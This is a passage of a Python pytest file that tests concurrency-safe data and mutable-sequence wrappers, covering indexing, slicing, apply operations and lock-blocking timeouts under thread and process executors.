import multiprocessing.managers as mp_mngr import time from queue import Full, Empty from typing import Optional, Callable, Final, Any, Tuple, cast, Union, overload, List import pytest from concurrency._fixtures import fix_csl, fix_manager, fix_picklable_manager,\ fix_csdata_factory, fix_exec, fix_init_csdata, \ fix_cscapacityqueue_factory, fix_init_queue, fix_cschunkcapacityqueue_factory, fix_csmseq_factory, \ fix_csmlseq_factory, fix_init_csmseqdata from concurrency import cs, csdata, execs from utils.types.casts import c_assert_not_none from utils.types.typevars import TYPE, TYPE2 from utils.functional import tools as ft import utils.types.containers as con INT_VAL: Final[int] = 333 ADD_X: Final[int] = 2 APPLY_TIMEOUT: Final[float] = 8.0 def __apply_add_x(num: int) -> Tuple[int, Tuple[str, int]]: return num + ADD_X, (__apply_add_x.__name__, num) def __apply_add_x_timeout(num: int) -> Tuple[int, Tuple[str, int]]: time.sleep(APPLY_TIMEOUT) return num + ADD_X, (__apply_add_x.__name__, num) # noinspection PyArgumentList def test_csdata(fix_csl: cs.En.CSL, fix_init_csdata: Any, fix_manager: Optional[mp_mngr.SyncManager], fix_csdata_factory: Callable[[cs.En.CSL, TYPE, Optional[mp_mngr.SyncManager]], csdata.Pr.CSData[TYPE]], fix_exec: execs.Im.Exec) -> None: cs_data: Final[csdata.Pr.CSData[Any]] = fix_csdata_factory(fix_csl, fix_init_csdata, fix_manager) execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_get.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': fix_init_csdata})}), 'max_check_count': 1}), join=True ), execs.Im.ExecParams( func_or_obj_func=(cs_data, cs_data.c_set.__name__), params=((), {'new_val': INT_VAL}), join=True), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, 
cs_data.c_get.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': INT_VAL})}), 'max_check_count': 1}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_apply.__name__), 'params_1': ((), { 'func': __apply_add_x }), 'el_2': ft.c_identity, 'params_2': ((), {'el': (__apply_add_x.__name__, INT_VAL)})}), 'max_check_count': 1}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_get.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': INT_VAL + ADD_X})}), 'max_check_count': 1}), join=True ) ], manager=fix_manager) if fix_csl > cs.En.CSL.SINGLE_THREAD: # noinspection PyArgumentList execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_apply.__name__), 'params_1': ((), { 'func': __apply_add_x_timeout }), 'el_2': ft.c_identity, 'params_2': ((), {'el': (__apply_add_x.__name__, INT_VAL + ADD_X)})}), 'max_check_count': 1}), join=False ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': (cs_data.c_get_csrwlock(), cs_data.c_get_csrwlock().c_is_held.__name__), 'params': ((), {}), 'max_duration': 1.0}), join=True), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_get.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': INT_VAL + 2 * ADD_X})}), 'max_check_count': 1}), join=True, min_sec=APPLY_TIMEOUT - 2.0, max_sec=APPLY_TIMEOUT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT, _max_sec=APPLY_TIMEOUT + 1.0) # noinspection PyArgumentList execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, 
join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_apply.__name__), 'params_1': ((), { 'func': __apply_add_x_timeout }), 'el_2': ft.c_identity, 'params_2': ((), {'el': (__apply_add_x.__name__, INT_VAL + 2 * ADD_X)})}), 'max_check_count': 1}), join=False ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': (cs_data.c_get_csrwlock(), cs_data.c_get_csrwlock().c_is_held.__name__), 'params': ((), {}), 'max_duration': 1.0}), join=True), execs.Im.ExecDelayedParams( func_or_obj_func=(cs_data, cs_data.c_set.__name__), params=((), {'new_val': INT_VAL}), join=True, min_sec=APPLY_TIMEOUT - 2.0, max_sec=APPLY_TIMEOUT + 1.0 ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_get.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': INT_VAL})}), 'max_check_count': 1}), join=True ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT, _max_sec=APPLY_TIMEOUT + 1.0) fix_exec.c_join() # noinspection PyArgumentList def test_csmseqdata_non_concurrent( fix_csl: cs.En.CSL, fix_init_csmseqdata: con.Pr.Iterable[Any], fix_manager: Optional[mp_mngr.SyncManager], fix_csmseq_factory: Callable[[cs.En.CSL, con.Pr.Iterable[TYPE], Optional[mp_mngr.SyncManager]], csdata.Pr.CSMutableSequence[TYPE]], fix_exec: execs.Im.Exec) -> None: fix_init_csmseqdata = tuple(fix_init_csmseqdata) init_len: Final[int] = len(fix_init_csmseqdata) assert init_len > 2 csmseq: csdata.Pr.CSMutableSequence[Any] = cast(csdata.Pr.CSMutableSequence[Any], fix_csmseq_factory(fix_csl, fix_init_csmseqdata, fix_manager)) # getitem int index for getitem_name in (csmseq.__getitem__.__name__, csmseq.c_get.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 
'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((init_len-1, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[init_len-1] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((-init_len, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[-init_len] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((0, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[0] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, getitem_name), 'params': ((init_len, ), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, getitem_name), 'params': ((-(init_len + 1), ), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, getitem_name), 'params': ((-(init_len + 10), ), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, getitem_name), 'params': ((init_len + 9, ), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # getitem slice index for getitem_name in 
(csmseq.__getitem__.__name__, csmseq.c_get.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(0, None), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(0, None), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[0:] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(1, 23), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[1:23] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(-100, 23), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[-100:23] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(-3, -1), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[-3:-1] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(-1, -3), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[-1:-3] 
}) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # setitem int index for setitem_name, offset in ((csmseq.__setitem__.__name__, 2), (csmseq.c_set.__name__, 1)): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=(csmseq, setitem_name), params=((init_len - offset, FILL_ELEM), {}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((init_len - offset, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': FILL_ELEM }) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # setitem int index for setitem_name, offset in ((csmseq.__setitem__.__name__, 2), (csmseq.c_set.__name__, 1)): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=(csmseq, setitem_name), params=((init_len - offset, FILL_ELEM), {}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((init_len - offset, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': FILL_ELEM }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=(csmseq, setitem_name), params=((-init_len, FILL_ELEM), {}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((-init_len, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': FILL_ELEM }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((init_len, "SOMEVAL"), None), 'expected_exception': IndexError }), 
'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((-(init_len + 1), "SOMEVAL"), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # setitem slice - unchanged length for setitem_name in (csmseq.__setitem__.__name__, csmseq.c_set.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=(csmseq, setitem_name), params=((slice(1, 3), tuple(range(55, 57))), {}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((slice(1, 3),), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': tuple(range(55, 57)) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=(csmseq, setitem_name), params=((slice(-(init_len + 10000), 1), (1233123123123123123, )), {}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((slice(-(init_len + 10000), 1),), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': (1233123123123123123,) }) }), 'max_check_count': 1 }), join=True ), ], manager=fix_manager) if not isinstance(csmseq, con.Pr.MutableLengthSequence): # setitem slice - changed length - expect IndexError for setitem_name in (csmseq.__setitem__.__name__, csmseq.c_set.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((slice(1, 3), (33123123,)), None), 'expected_exception': IndexError }), 
'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((slice(1, 2), (33123123, "asdfasdf")), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((slice(init_len, init_len + 1), (33123123, )), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((slice(-init_len - 10000, 0), (33123123, 3223123)), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # len execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__len__.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((len(fix_init_csmseqdata),), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((len(fix_init_csmseqdata),), None) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # reset csmseq[0:] = fix_init_csmseqdata assert (l := len(csmseq)) == len(fix_init_csmseqdata) and all(csmseq[i] == fix_init_csmseqdata[i] for i in range(l)) # iter and reversed execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': 
ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__iter__.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__reversed__.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': reversed(fix_init_csmseqdata) }) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # contains execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': (csmseq, csmseq.__contains__.__name__), 'params': ((fix_init_csmseqdata[-1], ), None), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': (csmseq, csmseq.__contains__.__name__), 'params': ((fix_init_csmseqdata[1], ), None), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_not, 'params': ((), { 'condition_check': (csmseq, csmseq.__contains__.__name__), 'params': (("I AM CERTAINLY NOT CONTAINED",), None) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # index execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.index.__name__), 'params_1': ((fix_init_csmseqdata[0], ), None), 'el_2': ft.c_identity, 'params_2': ((0,), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.index.__name__), 'params_1': ((fix_init_csmseqdata[1], 1, 2), None), 'el_2': ft.c_identity, 
'params_2': ((1,), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.index.__name__), 'params': (("I AM CERTAINLY NOT CONTAINED", 2, 44), None), 'expected_exception': ValueError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.index.__name__), 'params': ((fix_init_csmseqdata[0], init_len, init_len + 12), None), 'expected_exception': ValueError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # count execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.count.__name__), 'params_1': ((fix_init_csmseqdata[2], ), None), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata.count(fix_init_csmseqdata[2]),), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.count.__name__), 'params_1': ((fix_init_csmseqdata[0],), None), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata.count(fix_init_csmseqdata[0]),), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.count.__name__), 'params_1': (("I AM CERTAINLY NOT CONTAINED",), None), 'el_2': ft.c_identity, 'params_2': ((0,), None) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) fix_exec.c_join() APPLY_RETURN: Final[str] = "APPLY_RETURN" APPLY_TIMEOUT_SHORT: Final[float] = 5.0 def __apply_to_str(old_val: Any) -> Tuple[Any, str]: return str(old_val), APPLY_RETURN def 
__apply_to_str_seq(old_vals: con.Pr.RandomAccess[Any]) -> Tuple[con.Pr.Iterable[Any], str]: return tuple(str(elem) for elem in con.Ca.c_to_itbl(obj=old_vals)), APPLY_RETURN def __apply_to_str_seq_incr_len(old_vals: con.Pr.RandomAccess[Any]) -> Tuple[con.Pr.Iterable[Any], str]: return tuple(str(elem) for elem in con.Ca.c_to_itbl(obj=old_vals)) + ("Nope",), APPLY_RETURN def __apply_to_str_seq_decr_len(old_vals: con.Pr.RandomAccess[Any]) -> Tuple[con.Pr.Iterable[Any], str]: assert len(old_vals) > 0 return tuple(str(old_vals[i]) for i in range(len(old_vals) - 1)), APPLY_RETURN def __apply_delay(old_val: Any) -> Tuple[Any, str]: time.sleep(APPLY_TIMEOUT_SHORT) return old_val, APPLY_RETURN def __apply_no_delay(old_val: Any) -> Tuple[Any, str]: return old_val, APPLY_RETURN @overload def __apply_helper(mseq: con.Pr.MutableSequence[TYPE], index: int, func: Callable[[TYPE], Tuple[TYPE, TYPE2]]) -> TYPE2: ... @overload def __apply_helper(mseq: con.Pr.MutableSequence[TYPE], index: slice, func: Callable[[con.Pr.RandomAccess[TYPE]], Tuple[con.Pr.Iterable[TYPE], TYPE2]]) -> TYPE2: ... 
def __apply_helper(mseq: con.Pr.MutableSequence[TYPE], index: Union[int, slice], func: Union[Callable[[con.Pr.RandomAccess[TYPE]], Tuple[con.Pr.Iterable[TYPE], TYPE2]], Callable[[TYPE], Tuple[TYPE, TYPE2]]]) -> TYPE2: if isinstance(index, int): func = cast(Callable[[TYPE], Tuple[TYPE, TYPE2]], func) old_vals = mseq[index] new_vals = func(old_vals) mseq[index] = new_vals[0] return new_vals[1] else: assert isinstance(index, slice) func = cast(Callable[[con.Pr.RandomAccess[TYPE]], Tuple[con.Pr.Iterable[TYPE], TYPE2]], func) old_vals_ = mseq[index] new_vals_ = func(old_vals_) mseq[index] = new_vals_[0] return new_vals_[1] # noinspection PyArgumentList def test_csmseqdata_concurrent_apply( fix_csl: cs.En.CSL, fix_init_csmseqdata: con.Pr.Iterable[Any], fix_manager: Optional[mp_mngr.SyncManager], fix_csmseq_factory: Callable[[cs.En.CSL, con.Pr.Iterable[TYPE], Optional[mp_mngr.SyncManager]], csdata.Pr.CSMutableSequence[TYPE]], fix_exec: execs.Im.Exec) -> None: fix_init_csmseqdata = tuple(fix_init_csmseqdata) init_len: Final[int] = len(fix_init_csmseqdata) assert init_len > 2 csmseq: csdata.Pr.CSMutableSequence[Any] = cast(csdata.Pr.CSMutableSequence[Any], fix_csmseq_factory(fix_csl, fix_init_csmseqdata, fix_manager)) # apply execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_to_str }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_get.__name__), 'params_1': ((0,), None), 'el_2': ft.c_identity, 'params_2': ((str(fix_init_csmseqdata[0]),), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, 
params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': slice(1, 3), 'func': __apply_to_str_seq }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_get.__name__), 'params_1': ((slice(1, 3),), None), 'el_2': ft.c_identity, 'params_2': ((tuple(str(item) for item in fix_init_csmseqdata[1:3]),), None) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) if not isinstance(csmseq, con.Pr.MutableLengthSequence): # apply length change execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': slice(1, 3), 'func': __apply_to_str_seq_incr_len }), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': slice(1, 3), 'func': __apply_to_str_seq_decr_len }), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) if fix_csl > cs.En.CSL.SINGLE_THREAD: csmseq[0:] = fix_init_csmseqdata # test_blocking - apply execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( 
func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_no_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - getitem execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((0, ), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata[0],), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - c_get 
execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_get.__name__), 'params_1': ((0, ), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata[0],), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - setitem execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': 